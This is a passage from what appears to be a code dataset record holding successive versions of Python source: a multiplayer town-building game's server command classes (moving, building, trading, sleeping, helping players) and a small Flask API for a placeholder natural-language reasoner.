json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'buy'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n item = Item(self._transaction.item_name, 1)\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = 'SellCommand ServerCommand {}'.format(self._transaction.item_name\n )\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], BuildingTransaction.from_json_dict(\n json_dict['transaction']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sell'\n json_dict['tile'] = self._tile\n json_dict['transaction'] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.\n check_result)\n TransactionCheck(building, building, self._item).check(self.\n 
check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = 'Build Building ServerCommand {}'.format(self._item)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'], Item.from_json_dict(json_dict['item']))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'build_building'\n json_dict['tile'] = self._tile\n json_dict['item'] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if not building.construction_inventory.is_full():\n self.check_result += 'construction not finished'\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = 'Upgrade Building ServerCommand {}'.format(self._tile)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict['tile'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'upgrade_building'\n json_dict['tile'] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n tile = self.town.get_player_tile(self.client_id)\n if tile in self.town.buildings and self.town.buildings[tile\n ].name != 
'cabane':\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n player.status = 'sleep'\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n if tile in self.town.buildings and self.town.buildings[tile\n ].name == 'cabane':\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = 'Sleep command. Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'sleep'\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n if is_awaken_check:\n self.check_result += '{} is already awake'.format(player.name)\n\n def _do(self):\n player = self.town.get_player(self.client_id)\n player.status = 'idle'\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = 'Wake up command. 
Player id: {}'.format(self.client_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'wakeup'\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n if self.client_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n client_id)\n return\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += 'Player {} does not exist'.format(self.\n _player_to_help_id)\n return\n if self.town.get_player_tile(self.client_id\n ) != self.town.get_player_tile(self._player_to_help_id):\n self.check_result += ('Players {} and {} are not in the same tile'\n .format(self.client_id, self._player_to_help_id))\n return\n EnergyCheck(self.town.get_player(self.client_id), HelpPlayerCommand\n .ENERGY_TO_HELP).check(self.check_result)\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check)\n if is_alive_check:\n self.check_result += '{} has enough health to keep moving'.format(\n self._player_to_help_id)\n\n def _do(self):\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n player_to_help = self.town.get_player(self._player_to_help_id)\n player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = 'HelpPlayerCommand: try to help {}'.format(self.\n _player_to_help_id)\n if not self.check_result:\n msg += '\\n{}'.format(self.check_result)\n return 
msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) ->HelpPlayerCommand:\n return cls(json_dict['player_to_help_id'])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict['command'] = 'help'\n json_dict['player_to_help_id'] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n COMMANDS_DICT = {}\n COMMANDS_DICT['move'] = MovePlayerCommand\n COMMANDS_DICT['build'] = BuildCommand\n COMMANDS_DICT['collect'] = CollectResourceCommand\n COMMANDS_DICT['building_process'] = BuildingProcessCommand\n COMMANDS_DICT['buy'] = BuyCommand\n COMMANDS_DICT['sell'] = SellCommand\n COMMANDS_DICT['build_building'] = BuildBuildingCommand\n COMMANDS_DICT['upgrade_building'] = UpgradeBuildingCommand\n COMMANDS_DICT['help'] = HelpPlayerCommand\n COMMANDS_DICT['sleep'] = SleepCommand\n COMMANDS_DICT['wakeup'] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n if podsixnet_dict['command'] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[podsixnet_dict['command']\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n command.client_id = podsixnet_dict['client_id']\n command.check_result = CheckResult.from_json_dict(podsixnet_dict[\n 'check_result'])\n return command\n",
"step-5": "from __future__ import annotations\n\nimport math\nfrom abc import abstractmethod\n\nfrom pytown_core.patterns.behavioral import Command\nfrom pytown_core.serializers import IJSONSerializable\n\nfrom .buildings import BuildingProcess, BuildingTransaction\nfrom .buildings.factory import BuildingFactory\nfrom .check import (\n AvailableCheck,\n AwakenCheck,\n BackgroundBuildCheck,\n BackgroundMovementCheck,\n CheckResult,\n EnergyCheck,\n InventoryAddCheck,\n InventoryRemoveCheck,\n TransactionCheck,\n)\nfrom .inventory import Item\n\n\nclass ServerCommand(IJSONSerializable, Command):\n def __init__(self):\n\n self.client_id = None\n self.town = None # TODO: will be set by townmanager\n self.check_result = CheckResult()\n\n def execute(self):\n self._check()\n\n if self.check_result:\n self._do()\n\n @abstractmethod\n def _check(self):\n raise NotImplementedError\n\n @abstractmethod\n def _do(self):\n raise NotImplementedError\n\n @abstractmethod\n def __repr__(self):\n pass\n\n @classmethod\n @abstractmethod\n def from_json_dict(cls, json_dict) -> ServerCommand:\n raise NotImplementedError\n\n def to_json_dict(self) -> dict:\n json_dict = {}\n json_dict[\"client_id\"] = self.client_id\n json_dict[\"check_result\"] = self.check_result.to_json_dict()\n return json_dict\n\n def to_podsixnet(self):\n podsixnet_dict = self.to_json_dict()\n podsixnet_dict[\"action\"] = \"command\"\n return podsixnet_dict\n\n\nclass MovePlayerCommand(ServerCommand):\n\n ENERGY_COST = 1\n\n def __init__(self, direction: str):\n ServerCommand.__init__(self)\n\n self._direction = direction\n\n def __repr__(self):\n msg = \"Move ServerCommand : {}\".format(self._direction)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n EnergyCheck(player, MovePlayerCommand.ENERGY_COST).check(self.check_result)\n\n AvailableCheck(player).check(self.check_result)\n\n for tile in 
self._get_tiles_coordinates_dict().values():\n if tile not in self.town.backgrounds.keys():\n self.check_result += \"tile {} not in town\".format(tile)\n return\n\n BackgroundMovementCheck(self.town.backgrounds[tile], player).check(\n self.check_result\n )\n\n def _do(self):\n\n (x_dest, y_dest) = self.tile_dest\n player = self.town.get_player(self.client_id)\n player.status = \"move\"\n player.direction = self._direction\n player.energy.value -= MovePlayerCommand.ENERGY_COST\n\n player.x = x_dest\n player.y = y_dest\n\n @property\n def tile_dest(self) -> tuple:\n movement_matrix = {}\n movement_matrix[\"left\"] = (-1, 0)\n movement_matrix[\"right\"] = (+1, 0)\n movement_matrix[\"up\"] = (0, -1)\n movement_matrix[\"down\"] = (0, +1)\n\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n background = self.town.backgrounds[tile]\n\n bg_multiplicator = background.move_multiplicator\n x_dest = (\n player.x\n + movement_matrix[self._direction][0] * bg_multiplicator * player.velocity\n )\n y_dest = (\n player.y\n + movement_matrix[self._direction][1] * bg_multiplicator * player.velocity\n )\n\n return (x_dest, y_dest)\n\n def _get_tiles_coordinates_dict(self):\n\n (x_dest, y_dest) = self.tile_dest\n\n tiles_coordinates_dict = {\n \"topleft\": (math.floor(x_dest), math.floor(y_dest)),\n \"topright\": (math.floor(x_dest + 0.99), math.floor(y_dest)),\n \"bottomleft\": (math.floor(x_dest), math.floor(y_dest + 0.99)),\n \"bottomright\": (math.floor(x_dest + 0.99), math.floor(y_dest + 0.99)),\n }\n return tiles_coordinates_dict\n\n @classmethod\n def from_json_dict(cls, json_dict) -> MovePlayerCommand:\n return cls(json_dict[\"direction\"])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"move\"\n json_dict[\"direction\"] = self._direction\n return json_dict\n\n\nclass BuildCommand(ServerCommand):\n def __init__(self, tile: tuple, building_name: str):\n ServerCommand.__init__(self)\n\n 
self._tile = tile\n self._building_name = building_name\n\n def _check(self):\n\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n\n if self._tile not in self.town.backgrounds:\n self.check_result += \"tile {} not in town\".format(self._tile)\n return\n\n background = self.town.backgrounds[self._tile]\n BackgroundBuildCheck(background, self._building_name).check(self.check_result)\n\n if self._tile in self.town.buildings:\n self.check_result += \"Can't build {} : {} already built on {}\".format(\n self._building_name, self.town.buildings[self._tile].name, self._tile\n )\n\n def _do(self):\n self.town.set_building(\n BuildingFactory.create_building_by_name(self._building_name), self._tile\n )\n\n def __repr__(self):\n msg = \"Build ServerCommand : {} in {}\".format(self._building_name, self._tile)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> BuildCommand:\n return cls(json_dict[\"tile\"], json_dict[\"building_name\"])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"build\"\n json_dict[\"building_name\"] = self._building_name\n json_dict[\"tile\"] = self._tile\n return json_dict\n\n\nclass CollectResourceCommand(ServerCommand):\n\n ENERGY_COST = 30\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n\n self._tile = tile\n self._item = item\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n\n AvailableCheck(player).check(self.check_result)\n\n if self._tile not in self.town.resources:\n self.check_result += \"No resource in {}\".format(self._tile)\n return\n\n resource = self.town.resources[self._tile]\n\n TransactionCheck(resource, player, self._item).check(self.check_result)\n\n EnergyCheck(player, CollectResourceCommand.ENERGY_COST).check(self.check_result)\n\n def _do(self):\n player = 
self.town.get_player(self.client_id)\n player.inventory.add_item(self._item)\n resource = self.town.resources[self._tile]\n resource.inventory.remove_item(self._item)\n player.energy.value -= CollectResourceCommand.ENERGY_COST\n\n def __repr__(self):\n msg = \"Collect Resource ServerCommand : {}\".format(self._item)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> CollectResourceCommand:\n return cls(json_dict[\"tile\"], Item.from_json_dict(json_dict[\"item\"]))\n\n def to_json_dict(self) -> dict:\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"collect\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"item\"] = self._item.to_json_dict()\n return json_dict\n\n\nclass BuildingProcessCommand(ServerCommand):\n def __init__(self, tile: tuple, building_process: BuildingProcess):\n ServerCommand.__init__(self)\n\n self._tile = tile\n self._building_process = building_process\n\n def _check(self):\n\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n\n if self._tile not in self.town.buildings:\n self.check_result += \"No building on {}\".format(self._tile)\n return\n\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n InventoryRemoveCheck(\n building.inventory, self._building_process.item_required\n ).check(self.check_result)\n InventoryAddCheck(building.inventory, self._building_process.item_result).check(\n self.check_result\n )\n EnergyCheck(player, self._building_process.energy_required).check(\n self.check_result\n )\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.inventory.remove_item(self._building_process.item_required)\n building.inventory.add_item(self._building_process.item_result)\n player = self.town.get_player(self.client_id)\n player.energy.value -= self._building_process.energy_required\n\n def __repr__(self):\n msg = 
\"BuildingProcessCommand ServerCommand {}\".format(self._building_process)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(\n json_dict[\"tile\"],\n BuildingProcess.from_json_dict(json_dict[\"building_process\"]),\n )\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"building_process\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"building_process\"] = self._building_process.to_json_dict()\n return json_dict\n\n\nclass BuyCommand(ServerCommand):\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n\n self._tile = tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n item = Item(self._transaction.item_name, 1)\n\n AvailableCheck(player).check(self.check_result)\n\n TransactionCheck(building, player, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.remove_item(item)\n player.inventory.add_item(item)\n\n def __repr__(self):\n msg = \"BuyCommand ServerCommand {}\".format(self._transaction.item_name)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(\n json_dict[\"tile\"],\n BuildingTransaction.from_json_dict(json_dict[\"transaction\"]),\n )\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"buy\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"transaction\"] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass SellCommand(ServerCommand):\n def __init__(self, tile: tuple, transaction: BuildingTransaction):\n ServerCommand.__init__(self)\n\n self._tile = 
tile\n self._transaction = transaction\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n item = Item(self._transaction.item_name, 1)\n\n AvailableCheck(player).check(self.check_result)\n TransactionCheck(player, building, item).check(self.check_result)\n\n def _do(self):\n item = Item(self._transaction.item_name, 1)\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n building.inventory.add_item(item)\n player.inventory.remove_item(item)\n\n def __repr__(self):\n msg = \"SellCommand ServerCommand {}\".format(self._transaction.item_name)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(\n json_dict[\"tile\"],\n BuildingTransaction.from_json_dict(json_dict[\"transaction\"]),\n )\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"sell\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"transaction\"] = self._transaction.to_json_dict()\n return json_dict\n\n\nclass BuildBuildingCommand(ServerCommand):\n\n ENERGY_COST = 20\n\n def __init__(self, tile: tuple, item: Item):\n ServerCommand.__init__(self)\n\n self._item = item\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n AvailableCheck(player).check(self.check_result)\n\n EnergyCheck(player, BuildBuildingCommand.ENERGY_COST).check(self.check_result)\n TransactionCheck(building, building, self._item).check(self.check_result)\n\n def _do(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n\n player.energy.value -= BuildBuildingCommand.ENERGY_COST\n building.inventory.remove_item(self._item)\n building.construction_inventory.add_item(self._item)\n\n def __repr__(self):\n msg = \"Build Building ServerCommand {}\".format(self._item)\n 
if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict[\"tile\"], Item.from_json_dict(json_dict[\"item\"]))\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"build_building\"\n json_dict[\"tile\"] = self._tile\n json_dict[\"item\"] = self._item.to_json_dict()\n return json_dict\n\n\nclass UpgradeBuildingCommand(ServerCommand):\n def __init__(self, tile: tuple):\n ServerCommand.__init__(self)\n\n self._tile = tile\n\n def _check(self):\n building = self.town.buildings[self._tile]\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n\n if not building.construction_inventory.is_full():\n self.check_result += \"construction not finished\"\n\n def _do(self):\n building = self.town.buildings[self._tile]\n building.upgrade()\n\n def __repr__(self):\n msg = \"Upgrade Building ServerCommand {}\".format(self._tile)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict):\n return cls(json_dict[\"tile\"])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"upgrade_building\"\n json_dict[\"tile\"] = self._tile\n return json_dict\n\n\nclass SleepCommand(ServerCommand):\n\n ENERGY_REGEN_IN_HOUSE = 4\n ENERGY_REGEN_IN_GROUND = 2\n\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n\n tile = self.town.get_player_tile(self.client_id)\n\n # Player not in building\n if tile in self.town.buildings and self.town.buildings[tile].name != \"cabane\":\n self.check_result += \"Can't sleep in building\"\n\n def _do(self):\n\n player = self.town.get_player(self.client_id)\n tile = self.town.get_player_tile(self.client_id)\n\n # Change player sprite\n player.status = \"sleep\"\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_GROUND\n\n # Change 
energy regeneration depending on where he sleeps\n if tile in self.town.buildings and self.town.buildings[tile].name == \"cabane\":\n player.energy.regen = SleepCommand.ENERGY_REGEN_IN_HOUSE\n\n def __repr__(self):\n msg = \"Sleep command. Player id: {}\".format(self.client_id)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> SleepCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"sleep\"\n return json_dict\n\n\nclass WakeUpCommand(ServerCommand):\n def __init__(self):\n ServerCommand.__init__(self)\n\n def _check(self):\n\n player = self.town.get_player(self.client_id)\n\n is_awaken_check = CheckResult()\n AwakenCheck(player).check(is_awaken_check)\n\n if is_awaken_check:\n self.check_result += \"{} is already awake\".format(player.name)\n\n def _do(self):\n\n player = self.town.get_player(self.client_id)\n player.status = \"idle\"\n\n player.energy.reset_regen()\n\n def __repr__(self):\n msg = \"Wake up command. 
Player id: {}\".format(self.client_id)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> WakeUpCommand:\n return cls()\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"wakeup\"\n return json_dict\n\n\nclass HelpPlayerCommand(ServerCommand):\n\n ENERGY_TO_HELP = 20\n HEALTH_TO_GIVE = 1\n\n def __init__(self, player_to_help_id):\n ServerCommand.__init__(self)\n\n self._player_to_help_id = player_to_help_id\n\n def _check(self):\n player = self.town.get_player(self.client_id)\n AvailableCheck(player).check(self.check_result)\n\n # The two players id exists in the town ?\n if self.client_id not in self.town.players.keys():\n self.check_result += \"Player {} does not exist\".format(self.client_id)\n return\n\n if self._player_to_help_id not in self.town.players.keys():\n self.check_result += \"Player {} does not exist\".format(\n self._player_to_help_id\n )\n return\n\n # Check if the two players are in the same tile\n if self.town.get_player_tile(self.client_id) != self.town.get_player_tile(\n self._player_to_help_id\n ):\n self.check_result += \"Players {} and {} are not in the same tile\".format(\n self.client_id, self._player_to_help_id\n )\n return\n\n # Check if I have enough energy to help\n EnergyCheck(\n self.town.get_player(self.client_id), HelpPlayerCommand.ENERGY_TO_HELP\n ).check(self.check_result)\n\n # Check if patient doesn't have health\n is_alive_check = CheckResult()\n AvailableCheck(self.town.get_player(self._player_to_help_id)).check(\n is_alive_check\n )\n\n if is_alive_check:\n self.check_result += \"{} has enough health to keep moving\".format(\n self._player_to_help_id\n )\n\n def _do(self):\n\n player_helper = self.town.get_player(self.client_id)\n player_helper.energy.value -= HelpPlayerCommand.ENERGY_TO_HELP\n\n player_to_help = self.town.get_player(self._player_to_help_id)\n 
player_to_help.health.value += HelpPlayerCommand.HEALTH_TO_GIVE\n\n def __repr__(self):\n msg = \"HelpPlayerCommand: try to help {}\".format(self._player_to_help_id)\n if not self.check_result:\n msg += \"\\n{}\".format(self.check_result)\n return msg\n\n @classmethod\n def from_json_dict(cls, json_dict: dict) -> HelpPlayerCommand:\n return cls(json_dict[\"player_to_help_id\"])\n\n def to_json_dict(self):\n json_dict = super().to_json_dict()\n json_dict[\"command\"] = \"help\"\n json_dict[\"player_to_help_id\"] = self._player_to_help_id\n return json_dict\n\n\nclass CommandsFactory:\n\n COMMANDS_DICT = {}\n COMMANDS_DICT[\"move\"] = MovePlayerCommand\n COMMANDS_DICT[\"build\"] = BuildCommand\n COMMANDS_DICT[\"collect\"] = CollectResourceCommand\n COMMANDS_DICT[\"building_process\"] = BuildingProcessCommand\n COMMANDS_DICT[\"buy\"] = BuyCommand\n COMMANDS_DICT[\"sell\"] = SellCommand\n COMMANDS_DICT[\"build_building\"] = BuildBuildingCommand\n COMMANDS_DICT[\"upgrade_building\"] = UpgradeBuildingCommand\n COMMANDS_DICT[\"help\"] = HelpPlayerCommand\n COMMANDS_DICT[\"sleep\"] = SleepCommand\n COMMANDS_DICT[\"wakeup\"] = WakeUpCommand\n\n @staticmethod\n def from_podsixnet(podsixnet_dict):\n\n if podsixnet_dict[\"command\"] in CommandsFactory.COMMANDS_DICT:\n command = CommandsFactory.COMMANDS_DICT[\n podsixnet_dict[\"command\"]\n ].from_json_dict(podsixnet_dict)\n else:\n raise NotImplementedError\n\n command.client_id = podsixnet_dict[\"client_id\"]\n command.check_result = CheckResult.from_json_dict(\n podsixnet_dict[\"check_result\"]\n )\n return command\n",
"step-ids": [
72,
74,
84,
86,
98
]
}
|
[
72,
74,
84,
86,
98
] |
<|reserved_special_token_0|>
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
<|reserved_special_token_0|>
@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',
'POST'])
def reason_apply():
rule_id = request.args.get('id')
if rule_id == 'reasonEnglish':
json_data = request.get_json()
new_goal = common_transform(json_data, 'goal')
return jsonify({'result': 'success', 'newGoals': [new_goal] if
new_goal['data'] else []})
else:
return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})
@app.route('/api/{}/translate'.format(VERSION_STRING))
def translate_base():
other_languages = ['lang.speedith', 'lang.isabelle']
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield x, y
yield y, x
return jsonify({'result': 'success', 'translations': [(from_lang,
to_lang, 'manual') for from_lang, to_lang in all_pairs(
other_languages, [LANG_ID])]})
@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[
'GET', 'POST'])
def translate_apply():
from_language = request.args.get('from')
to_language = request.args.get('to')
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,
to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, 'formula')
return jsonify({'result': 'success', 'formula': new_goal})
else:
return jsonify({'result': 'failure', 'reason':
'Unable to translate when one of the languages is not {}'.
format(LANG_ID)})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/')
def entry():
return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':
'https://aaron.stockdill.nz/', 'version': VERSION_STRING,
'description': 'A placeholder natural language reasoner.', 'icon':
'', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(
VERSION_STRING), 'provides': {'reason': '/reason', 'translate':
'/translate'}}])
<|reserved_special_token_0|>
@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',
'POST'])
def reason_apply():
rule_id = request.args.get('id')
if rule_id == 'reasonEnglish':
json_data = request.get_json()
new_goal = common_transform(json_data, 'goal')
return jsonify({'result': 'success', 'newGoals': [new_goal] if
new_goal['data'] else []})
else:
return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})
@app.route('/api/{}/translate'.format(VERSION_STRING))
def translate_base():
other_languages = ['lang.speedith', 'lang.isabelle']
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield x, y
yield y, x
return jsonify({'result': 'success', 'translations': [(from_lang,
to_lang, 'manual') for from_lang, to_lang in all_pairs(
other_languages, [LANG_ID])]})
@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[
'GET', 'POST'])
def translate_apply():
from_language = request.args.get('from')
to_language = request.args.get('to')
print(LANG_ID in {from_language, to_language}, LANG_ID, from_language,
to_language)
if LANG_ID in {from_language, to_language}:
json_data = request.get_json()
new_goal = common_transform(json_data, 'formula')
return jsonify({'result': 'success', 'formula': new_goal})
else:
return jsonify({'result': 'failure', 'reason':
'Unable to translate when one of the languages is not {}'.
format(LANG_ID)})
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
app = Flask(__name__)
VERSION = 0, 1, 0
VERSION_STRING = '{}.{}.{}'.format(*VERSION)
LANG_ID = 'lang.natural.english'
@app.errorhandler(404)
def not_found(error):
return make_response(jsonify({'error': 'Not found'}), 404)
@app.route('/')
def entry():
return jsonify([{'id': 'com.natlang', 'name': 'NatLang', 'website':
'https://aaron.stockdill.nz/', 'version': VERSION_STRING,
'description': 'A placeholder natural language reasoner.', 'icon':
'', 'base': 'http://aarons-macbook.local:5003/api/{}'.format(
VERSION_STRING), 'provides': {'reason': '/reason', 'translate':
'/translate'}}])
@app.route('/api/{}/reason'.format(VERSION_STRING))
def reason_base():
return jsonify({'result': 'success', 'reasoning': [[LANG_ID, 'manual',
'reasonEnglish', 'Manually reason with natural language.']]})
def common_transform(json_data, key):
old_goal = json_data.get(key)
new_goal_data = json_data.get('extraInfo')
new_goal = old_goal.copy()
new_goal['data'] = new_goal_data
new_goal['language'] = LANG_ID
print(new_goal)
return new_goal
@app.route('/api/{}/reason/apply'.format(VERSION_STRING), methods=['GET',
'POST'])
def reason_apply():
rule_id = request.args.get('id')
if rule_id == 'reasonEnglish':
json_data = request.get_json()
new_goal = common_transform(json_data, 'goal')
return jsonify({'result': 'success', 'newGoals': [new_goal] if
new_goal['data'] else []})
else:
return jsonify({'result': 'failure', 'reason': 'Unknown rule ID.'})
@app.route('/api/{}/translate'.format(VERSION_STRING))
def translate_base():
other_languages = ['lang.speedith', 'lang.isabelle']
def all_pairs(xs, ys):
for x in xs:
for y in ys:
yield x, y
yield y, x
return jsonify({'result': 'success', 'translations': [(from_lang,
to_lang, 'manual') for from_lang, to_lang in all_pairs(
other_languages, [LANG_ID])]})
@app.route('/api/{}/translate/translate'.format(VERSION_STRING), methods=[
'GET', 'POST'])
def translate_apply():
from_language = request.args.get('from')
